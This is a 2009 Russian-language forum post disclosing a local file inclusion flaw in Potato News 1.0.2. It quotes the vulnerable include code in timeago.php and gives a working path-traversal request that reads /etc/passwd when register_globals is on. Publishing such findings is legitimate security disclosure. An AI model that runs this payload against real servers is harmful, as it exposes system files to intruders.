03.06.2009, 16:20
|
|
Постоянный
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме:
7561206
Репутация:
1861
|
|
Уязвимости Potato News 1.0.2
Уязвимости Potato News 1.0.2
download: http://potato-news.googlecode.com/files/potatonews-1.0.2.zip
LFI
(требования: register_globals=on)
/timeago.php
уязвимый код:
PHP код:
if (file_exists("data/comments/$nid.ip.php")) {
include("data/comments/$nid.ip.php");
эксплуатирование:
Код:
/timeago.php?nid=../../../../../../../../../../../../etc/passwd
(с) Iceangel_
|
|
|